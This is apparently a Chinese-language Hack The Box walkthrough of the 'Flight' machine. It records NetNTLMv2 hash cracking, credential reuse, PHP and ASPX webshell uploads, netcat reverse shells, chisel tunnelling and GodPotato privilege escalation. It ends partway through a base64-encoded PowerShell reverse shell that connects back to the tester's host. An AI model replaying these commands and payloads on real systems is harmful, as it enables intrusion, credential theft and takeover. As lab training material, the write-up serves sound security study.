└─$ sudo hashcat -m 5600 ./hash1 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

C.BUM::flight.htb:2d7de2d26f8b01e0:e362aa83a6c40e25eda75f05f22c43b0:010100000000000000c7d83930a6da01356f4ed08132edb60000000002000800310031005800590001001e00570049004e002d00560058004c00430049004b004f00390059004400340004003400570049004e002d00560058004c00430049004b004f0039005900440034002e0031003100580059002e004c004f00430041004c000300140031003100580059002e004c004f00430041004c000500140031003100580059002e004c004f00430041004c000700080000c7d83930a6da0106000400020000000800300030000000000000000000000000300000ce8ab8d7c7da8d70ac7e8f596e82db9e308c37379bd94eab01f02e0bcf9fca900a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000:Tikkycoll_431012284

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: C.BUM::flight.htb:2d7de2d26f8b01e0:e362aa83a6c40e25...000000
Time.Started.....: Tue May 14 18:58:11 2024 (5 secs)
Time.Estimated...: Tue May 14 18:58:16 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2036.5 kH/s (0.44ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10536960/14344385 (73.46%)
Rejected.........: 0/10536960 (0.00%)
Restore.Point....: 10535936/14344385 (73.45%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Time14250 -> TiffanyCamila
Hardware.Mon.#1..: Util: 81%

Started: Tue May 14 18:58:11 2024
Stopped: Tue May 14 18:58:18 2024

21、接下来进行尝试该账号密码可以登录哪些系统

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm flight.htb -u c.bum -p 'Tikkycoll_431012284'
SMB flight.htb 5985 G0 [*] Windows 10.0 Build 17763 (name:G0) (domain:flight.htb)
HTTP flight.htb 5985 G0 [*] http://flight.htb:5985/wsman
WINRM flight.htb 5985 G0 [-] flight.htb\c.bum:Tikkycoll_431012284

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb flight.htb -u c.bum -p 'Tikkycoll_431012284'
SMB flight.htb 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB flight.htb 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb flight.htb -u c.bum -p 'Tikkycoll_431012284' --shares
SMB flight.htb 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB flight.htb 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB flight.htb 445 G0 [+] Enumerated shares
SMB flight.htb 445 G0 Share Permissions Remark
SMB flight.htb 445 G0 ----- ----------- ------
SMB flight.htb 445 G0 ADMIN$ Remote Admin
SMB flight.htb 445 G0 C$ Default share
SMB flight.htb 445 G0 IPC$ READ Remote IPC
SMB flight.htb 445 G0 NETLOGON READ Logon server share
SMB flight.htb 445 G0 Shared READ,WRITE
SMB flight.htb 445 G0 SYSVOL READ Logon server share
SMB flight.htb 445 G0 Users READ
SMB flight.htb 445 G0 Web READ,WRITE

22、果然是硬核级别啊,这一个用户一个用户的绕过登录,搁前面简单和中级早就拿到第一个flag了,在 SMB 上,具有额外的写入权限:C.BumWeb,看来到这里就是在网站上面写入个WEBSHELL来获取初始的反弹shell了吧,直接登录并上传吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\flight.htb\\Web -U c.bum%'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue May 14 18:17:00 2024
.. D 0 Tue May 14 18:17:00 2024
flight.htb D 0 Tue May 14 18:17:00 2024
school.flight.htb D 0 Tue May 14 18:17:00 2024

5056511 blocks of size 4096. 1203305 blocks available
smb: \> cd school.flight.htb
smb: \school.flight.htb\> put ./qsd-php-backdoor.php
putting file ./qsd-php-backdoor.php as \school.flight.htb\qsd-php-backdoor.php (29.5 kb/s) (average 29.5 kb/s)
smb: \school.flight.htb\> exit

23、访问木马文件,进行获取反弹shell

http://school.flight.htb/qsd-php-backdoor.php

https://sh1yan.top/rt-cmd/

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.187] 58241

PS C:\xampp\htdocs\school.flight.htb> whoami
flight\svc_apache
PS C:\xampp\htdocs\school.flight.htb>

24、查看下用户,和flag在哪个目录下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.187] 58241

PS C:\xampp\htdocs\school.flight.htb> whoami
flight\svc_apache
PS C:\xampp\htdocs\school.flight.htb> dir C:/Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:28 PM .NET v4.5
d----- 9/22/2022 12:28 PM .NET v4.5 Classic
d----- 10/31/2022 11:34 AM Administrator
d----- 9/22/2022 1:08 PM C.Bum
d-r--- 7/20/2021 12:23 PM Public
d----- 10/21/2022 11:50 AM svc_apache


PS C:\xampp\htdocs\school.flight.htb> dir C:/Users/svc_apache/Desktop
PS C:\xampp\htdocs\school.flight.htb> dir C:/Users/C.Bum/Desktop
PS C:\xampp\htdocs\school.flight.htb> cd C:/Users/svc_apache/Desktop
PS C:\Users\svc_apache\Desktop> ls
PS C:\Users\svc_apache\Desktop> cd C:/Users/C.Bum/Desktop
PS C:\Users\svc_apache\Desktop> ls
PS C:\Users\svc_apache\Desktop> type user.txt
PS C:\Users\svc_apache\Desktop>

25、看来不在这个用户的目录下,切换下其他用户看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿offsec)-[~/Desktop/tools/RunasCs]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.187 - - [14/May/2024 19:20:56] "GET /RunasCs.exe HTTP/1.1" 200 -


PS C:\Users\svc_apache\Desktop> powershell -c wget 10.10.14.45/RunasCs.exe -outfile r.exe
PS C:\Users\svc_apache\Desktop> ls


Directory: C:\Users\svc_apache\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/14/2024 3:27 AM 51712 r.exe


PS C:\Users\svc_apache\Desktop>

PS C:\Users\svc_apache\Desktop> .\r.exe c.bum Tikkycoll_431012284 powershell -r 10.10.14.45:88 -l 3
[*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '3'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type.
[*] Warning: The logon for user 'c.bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-7413f$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4140 created in background.
PS C:\Users\svc_apache\Desktop>

26、成功获取到另一个用户的权限

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 88
listening on [any] 88 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.187] 58300
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
flight\c.bum
PS C:\Windows\system32>

27、下面看看 flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
PS C:\Windows\system32> cd C:/Users
cd C:/Users
PS C:\Users> ls
ls


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:28 PM .NET v4.5
d----- 9/22/2022 12:28 PM .NET v4.5 Classic
d----- 10/31/2022 11:34 AM Administrator
d----- 9/22/2022 1:08 PM C.Bum
d-r--- 7/20/2021 12:23 PM Public
d----- 10/21/2022 11:50 AM svc_apache


PS C:\Users> cd C.Bum
cd C.Bum
PS C:\Users\C.Bum> cd Desktop
cd Desktop
PS C:\Users\C.Bum\Desktop> ls
ls


Directory: C:\Users\C.Bum\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/13/2024 5:00 AM 34 user.txt


PS C:\Users\C.Bum\Desktop> cat user.txt
cat user.txt
33db741bf1fc5a496ab30d33cad22b2a
PS C:\Users\C.Bum\Desktop>

0x02 系统权限获取

28、查看下当前进程端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
PS C:\Users\C.Bum\Desktop> netstat -ano
netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2740
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2740
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2784
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 496
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1104
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1536
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49675 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49676 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49681 0.0.0.0:0 LISTENING 636
TCP 0.0.0.0:49732 0.0.0.0:0 LISTENING 2932
TCP 0.0.0.0:49775 0.0.0.0:0 LISTENING 2872
TCP 10.10.11.187:53 0.0.0.0:0 LISTENING 2932
TCP 10.10.11.187:80 10.10.14.45:38850 ESTABLISHED 2740
TCP 10.10.11.187:139 0.0.0.0:0 LISTENING 4
TCP 10.10.11.187:389 10.10.11.187:57133 ESTABLISHED 648
TCP 10.10.11.187:389 10.10.11.187:57152 ESTABLISHED 648
TCP 10.10.11.187:389 10.10.11.187:57165 ESTABLISHED 648
TCP 10.10.11.187:57133 10.10.11.187:389 ESTABLISHED 2932
TCP 10.10.11.187:57152 10.10.11.187:389 ESTABLISHED 2872
TCP 10.10.11.187:57165 10.10.11.187:389 ESTABLISHED 2872
TCP 10.10.11.187:58241 10.10.14.45:443 ESTABLISHED 2180
TCP 10.10.11.187:58300 10.10.14.45:88 ESTABLISHED 1852
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2932
TCP 127.0.0.1:389 127.0.0.1:57167 ESTABLISHED 648
TCP 127.0.0.1:57167 127.0.0.1:389 ESTABLISHED 2932
TCP [::]:80 [::]:0 LISTENING 2740
TCP [::]:88 [::]:0 LISTENING 648
TCP [::]:135 [::]:0 LISTENING 924
TCP [::]:443 [::]:0 LISTENING 2740
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:464 [::]:0 LISTENING 648
TCP [::]:593 [::]:0 LISTENING 924
TCP [::]:3268 [::]:0 LISTENING 648
TCP [::]:3269 [::]:0 LISTENING 648
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8000 [::]:0 LISTENING 4
TCP [::]:9389 [::]:0 LISTENING 2784
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 496
TCP [::]:49665 [::]:0 LISTENING 1104
TCP [::]:49666 [::]:0 LISTENING 1536
TCP [::]:49667 [::]:0 LISTENING 648
TCP [::]:49675 [::]:0 LISTENING 648
TCP [::]:49676 [::]:0 LISTENING 648
TCP [::]:49681 [::]:0 LISTENING 636
TCP [::]:49732 [::]:0 LISTENING 2932
TCP [::]:49775 [::]:0 LISTENING 2872
TCP [::1]:53 [::]:0 LISTENING 2932
TCP [dead:beef::1d]:53 [::]:0 LISTENING 2932
TCP [dead:beef::d928:ebf4:663a:e435]:53 [::]:0 LISTENING 2932
TCP [fe80::d928:ebf4:663a:e435%6]:53 [::]:0 LISTENING 2932
TCP [fe80::d928:ebf4:663a:e435%6]:49667 [fe80::d928:ebf4:663a:e435%6]:49764 ESTABLISHED 648
TCP [fe80::d928:ebf4:663a:e435%6]:49667 [fe80::d928:ebf4:663a:e435%6]:49860 ESTABLISHED 648
TCP [fe80::d928:ebf4:663a:e435%6]:49764 [fe80::d928:ebf4:663a:e435%6]:49667 ESTABLISHED 2872
TCP [fe80::d928:ebf4:663a:e435%6]:49860 [fe80::d928:ebf4:663a:e435%6]:49667 ESTABLISHED 648
UDP 0.0.0.0:123 *:* 788
UDP 0.0.0.0:389 *:* 648
UDP 0.0.0.0:5353 *:* 1148
UDP 0.0.0.0:5355 *:* 1148
UDP 0.0.0.0:55987 *:* 1148
UDP 0.0.0.0:60674 *:* 2932
UDP 10.10.11.187:53 *:* 2932
UDP 10.10.11.187:88 *:* 648
UDP 10.10.11.187:137 *:* 4
UDP 10.10.11.187:138 *:* 4
UDP 10.10.11.187:464 *:* 648
UDP 127.0.0.1:53 *:* 2932
UDP 127.0.0.1:51311 *:* 2056
UDP 127.0.0.1:51664 *:* 1368
UDP 127.0.0.1:58969 *:* 3852
UDP 127.0.0.1:61234 *:* 2784
UDP 127.0.0.1:61235 *:* 2872
UDP 127.0.0.1:61236 *:* 2932
UDP 127.0.0.1:61237 *:* 1256
UDP 127.0.0.1:63449 *:* 2996
UDP 127.0.0.1:65458 *:* 780
UDP [::]:123 *:* 788
UDP [::]:5353 *:* 1148
UDP [::]:5355 *:* 1148
UDP [::]:55987 *:* 1148
UDP [::]:60675 *:* 2932
UDP [::1]:53 *:* 2932
UDP [::1]:61231 *:* 2932
UDP [dead:beef::1d]:53 *:* 2932
UDP [dead:beef::1d]:88 *:* 648
UDP [dead:beef::1d]:464 *:* 648
UDP [dead:beef::d928:ebf4:663a:e435]:53 *:* 2932
UDP [dead:beef::d928:ebf4:663a:e435]:88 *:* 648
UDP [dead:beef::d928:ebf4:663a:e435]:464 *:* 648
UDP [fe80::d928:ebf4:663a:e435%6]:53 *:* 2932
UDP [fe80::d928:ebf4:663a:e435%6]:88 *:* 648
UDP [fe80::d928:ebf4:663a:e435%6]:464 *:* 648
PS C:\Users\C.Bum\Desktop>

29、端口这里发现了个新增的8000的端口,使用端口转发,转发出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.187 - - [14/May/2024 19:33:48] "GET /chisel_1.9.1_windows_amd64 HTTP/1.1" 200 -

PS C:\Users\C.Bum\Desktop> powershell -c wget 10.10.14.45/chisel_1.9.1_windows_amd64 -outfile c.exe
powershell -c wget 10.10.14.45/chisel_1.9.1_windows_amd64 -outfile c.exe
PS C:\Users\C.Bum\Desktop> ls
ls


Directory: C:\Users\C.Bum\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/14/2024 3:42 AM 9006080 c.exe
-ar--- 5/13/2024 5:00 AM 34 user.txt

┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ ./chisel_1.9.1_linux_arm64 server -p 12345 --reverse
2024/05/14 19:38:53 server: Reverse tunnelling enabled
2024/05/14 19:38:53 server: Fingerprint zyiqAc//DHrlCCwdpUE/bQa5XKZjHeIT3J5VxYHtoXE=
2024/05/14 19:38:53 server: Listening on http://0.0.0.0:12345

PS C:\Windows\system32> cd C://Users/C.Bum/Desktop
cd C://Users/C.Bum/Desktop
PS C:\Users\C.Bum\Desktop> ls
ls


Directory: C:\Users\C.Bum\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/14/2024 3:42 AM 9006080 c.exe
-ar--- 5/13/2024 5:00 AM 34 user.txt


PS C:\Users\C.Bum\Desktop> ./c.exe client 10.10.14.45:12345 R:8000:127.0.0.1:8000
./c.exe client 10.10.14.45:12345 R:8000:127.0.0.1:8000
2024/05/14 03:49:36 client: Connecting to ws://10.10.14.45:12345
2024/05/14 03:49:37 client: Connected (Latency 109.9408ms)


┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ ./chisel_1.9.1_linux_arm64 server -p 12345 --reverse
2024/05/14 19:38:53 server: Reverse tunnelling enabled
2024/05/14 19:38:53 server: Fingerprint zyiqAc//DHrlCCwdpUE/bQa5XKZjHeIT3J5VxYHtoXE=
2024/05/14 19:38:53 server: Listening on http://0.0.0.0:12345
2024/05/14 19:40:40 server: session#1: tun: proxy#R:8000=>8000: Listening

30、然后我们看一下这个端口是什么

http://127.0.0.1:8000/

31、又是一个网站信息,通过分析发现这个网站和下面这个地址是同一个,且当前网站是asp.net 的网站

1
C:\inetpub\development\

32、我们再次获取一个反弹shell地址来操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PS C:\Users\svc_apache\Desktop> .\r.exe c.bum Tikkycoll_431012284 powershell -r 10.10.14.45:53 -l 3
[*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '3'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type.
[*] Warning: The logon for user 'c.bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-7413f$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1476 created in background.
PS C:\Users\svc_apache\Desktop>

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.187] 58455
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> cd C:\inetpub\development\
cd C:\inetpub\development\
PS C:\inetpub\development> dir
dir


Directory: C:\inetpub\development


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/14/2024 3:52 AM css
d----- 5/14/2024 3:52 AM fonts
d----- 5/14/2024 3:52 AM img
d----- 5/14/2024 3:52 AM js
-a---- 4/16/2018 2:23 PM 9371 contact.html
-a---- 4/16/2018 2:23 PM 45949 index.html

33、查看下是否对目录拥有写入权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\inetpub\development> icacls .
icacls .
. flight\C.Bum:(OI)(CI)(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
PS C:\inetpub\development>

34、我们对当前路径是有写入权限的,那就继续在该目录上传一个aspx的WEBSHELL吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.187 - - [14/May/2024 20:16:30] "GET /cmdasp.aspx HTTP/1.1" 200 -

PS C:\inetpub\development> powershell -c wget 10.10.14.45/cmdasp.aspx -outfile cmdasp.aspx
powershell -c wget 10.10.14.45/cmdasp.aspx -outfile cmdasp.aspx
PS C:\inetpub\development> ls
ls


Directory: C:\inetpub\development


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/14/2024 6:12 AM css
d----- 5/14/2024 6:12 AM fonts
d----- 5/14/2024 6:12 AM img
d----- 5/14/2024 6:12 AM js
-a---- 5/14/2024 6:12 AM 1400 cmdasp.aspx
-a---- 4/16/2018 2:23 PM 9371 contact.html
-a---- 4/16/2018 2:23 PM 45949 index.html


PS C:\inetpub\development>

35、这里的本地文件包含式的读取,没法执行命令,会跳转,所以还是得在木马的首页上面弄才行。

http://school.flight.htb/?view=http://127.0.0.1:8000/cmdasp.aspx

http://127.0.0.1:8000/cmdasp.aspx

36、这里也不太能加载出来,继续换一个吧,到这里,我就感觉机器已经崩了,只能重置重新开始了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PS C:\inetpub\development\development> echo "shiyan" > 1.txt
echo "shiyan" > 1.txt
PS C:\inetpub\development\development> ls
ls


Directory: C:\inetpub\development\development


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/14/2024 6:47 AM css
d----- 5/14/2024 6:47 AM fonts
d----- 5/14/2024 6:47 AM img
d----- 5/14/2024 6:47 AM js
-a---- 5/14/2024 6:50 AM 18 1.txt
-a---- 4/16/2018 2:23 PM 9371 contact.html
-a---- 4/16/2018 2:23 PM 45949 index.html


PS C:\inetpub\development\development>

http://127.0.0.1:8000/development/1.txt

37、继续上传WEBSHELL

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.187 - - [14/May/2024 20:53:46] "GET /cmd.aspx HTTP/1.1" 200 -


PS C:\inetpub\development\development> powershell -c wget 10.10.14.45/cmd.aspx -outfile cmd.aspx
powershell -c wget 10.10.14.45/cmd.aspx -outfile cmd.aspx
PS C:\inetpub\development\development> ls
ls


Directory: C:\inetpub\development\development


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/14/2024 6:52 AM css
d----- 5/14/2024 6:52 AM fonts
d----- 5/14/2024 6:52 AM img
d----- 5/14/2024 6:52 AM js
-a---- 5/14/2024 6:53 AM 1548 cmd.aspx
-a---- 4/16/2018 2:23 PM 9371 contact.html
-a---- 4/16/2018 2:23 PM 45949 index.html


PS C:\inetpub\development\development>

http://127.0.0.1:8000/development/cmd.aspx

38、然后我们就获取到了网站的反弹shell了

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.187] 49893

PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>

39、开始分析当前账号权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\windows\system32\inetsrv>

40、可以使用烂土豆进行提权,iis apppool\defaultapppool拥有强大的令牌,可以被滥用以进行权限升级(又名土豆攻击)。HackTricks 的此页面总结了高级思想:SeImpersonatePrivilege,任何拥有此权限的进程都可以模拟(但不能创建)它能够处理的任何令牌。您可以从 Windows 服务 (DCOM) 获取特权令牌,使其针对该漏洞执行 NTLM 身份验证,然后以 SYSTEM 身份执行进程。

41、我将在这里使用GodPotato,因为它非常易于使用并且适用于几乎所有 Windows 版本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
PS C:\temp> iwr -uri http://10.10.14.45/GodPotato-NET4.exe -Outfile g.exe
PS C:\temp> ls


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/14/2024 7:13 AM 57344 g.exe
-a---- 5/14/2024 7:05 AM 347648 j.exe
-a---- 5/14/2024 7:00 AM 27136 P.exe
-a---- 5/14/2024 7:07 AM 7168 shell.exe


PS C:\temp> ./g.exe -cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA1ACIALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBk